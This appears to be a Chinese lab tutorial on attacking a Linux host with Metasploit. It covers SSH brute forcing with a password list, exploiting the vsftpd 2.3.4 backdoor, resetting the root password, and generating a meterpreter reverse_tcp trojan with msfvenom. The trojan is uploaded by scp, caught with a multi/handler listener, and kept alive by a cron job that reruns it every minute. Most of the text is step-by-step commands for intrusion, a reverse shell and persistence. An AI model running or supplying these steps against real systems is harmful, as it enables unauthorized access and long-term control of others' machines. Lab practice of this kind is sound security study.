linux暴力破解&漏洞利用

==禁止非法操作,仅限参考=

暴力破解

  • 编辑密码本(vim password.txt)
  • 无声进入msf(msfconsole -q)
  • 搜索ssh_login相关程序(search ssh_login)
  • 设置攻击参数(use 0)
    设置用户名(set username msfadmin)
    设置密码本(set pass_file /root/password.txt)
    设置攻击目标(set rhosts 192.168.10.143)
  • 发起攻击(运行run)
  • 查看攻击会话(sessions)
  • 进入某个会话(sessions ID)
  • 退出(exit)
  • show options://显示程序运行时所需要的参数

漏洞利用

  • 扫描目标是否存在"笑脸漏洞(vsftpd2.3.4)"(nmap -sV ip)
  • 发起漏洞利用
    进入msf(msfconsole)
    搜索vsftpd(search vsftpd)
    使用程序(use 0)
    设置攻击目标(set rhosts ip)
  • 发起攻击(run)
  • whoami://查看是哪个用户
  • passwd root:// 设置密码

植入木马,达到长期控制的目的

  • msfvenom:攻击载荷生成器
    -p://选择一个载荷
    -f://生成文件格式 (linux可执行的程序文件:elf,windows可执行的文件:exe)
    lhost://监听地址(攻击机kali的地址)
    lport://监听端口(攻击机kali的端口)
    -o:指定输出的文件名
    -h:查看帮助
  • msfvenom -p linux/x86/meterpreter/reverse_tcp -f elf lhost=192.168.10.224 lport=4444 -0 shell: // 给主机192.168.10.224,生成一个名为shell,端口为4444的木马程序

为了防止上传报错,需要修改kali的ssh配置

  • 创建.ssh目录
    mkdir .ssh
  • 配置config
    vim .ssh/config
  • 添加三行配置
  • Host
  • HostkeyAlgorithms +ssh-rsa
  • PubkeyAcceptedKeyTypes +ssh-rsa
  • 以root身份上传shell后门到192.168.10.143的/mnt
    scp shell [email protected]:/mnt

运行shell

  • 手动运行shell后门程序
    /mnt/shell & (&后台运行)
  • 在kali中侦听木马程序
  • 进入msf
    msfconsole
  • 使用侦听程序
    use exploit/multi/handler
  • 设置监听地址
    set lhost 192.168.10.224
  • 设置监听端口
    set lport 4444
  • 设置载荷
    set payload linux/x86/meterpreter/reverse_tcp
  • 运行
    run
    ps:侦听模块在侦听木马上线的时候参数值必须与生成木马的参数一致

如果想要让木马长期运行不被kill,需要做计划任务,定期运行

  • 编辑计划任务:
  • EDITOR:编辑器
    EDITOR=vim crontab -e
    *
    *
    *
    *
    * /mnt/shell&(每分钟运行一次)
  • 再次进入msf
  • 使用侦听程序
    use exploit/multi/handler
  • 设置监听地址
    set lhost 192.168.10.224
  • 设置监听端口
    set lport 4444
  • 设置载荷
    set payload linux/x86/meterpreter/reverse_tcp
  • 运行
    run
  • 查看计划任务
    crontab -l
  • meterpreter>下将会话放到后台
    background
相关推荐
啊哦1116 分钟前
配置防火墙和SELinux(1)
linux·服务器·网络
唐青枫10 分钟前
Linux 换行符的使用详解
linux
A charmer22 分钟前
【Linux】文件系统知识梳理:从磁盘硬件到文件管理
linux·运维·服务器
Cynthia的梦37 分钟前
Linux学习-Linux进程间通信(IPC)聊天程序实践指南
linux·运维·学习
卡戎-caryon44 分钟前
【Linux网络与网络编程】03.UDP Socket编程
linux·服务器·网络·笔记·单例模式·udp·网络通信
張萠飛1 小时前
Linux的TCP连接数到达2万,其中tcp_tw、tcp_alloc、tcp_inuse都很高,可能出现什么问题
linux·网络·tcp/ip
孙同学_1 小时前
【Linux篇】自主Shell命令行解释器
android·linux
apcipot_rain1 小时前
【数据库原理及安全实验】实验一 数据库安装与创建
数据库·安全
爱上大树的小猪2 小时前
【前端安全】模板字符串动态拼接HTML的防XSS完全指南
前端·安全·html
莲动渔舟2 小时前
Nyquist插件基础:LISP语法-自定义函数
服务器·开发语言·lisp·音频处理·audacity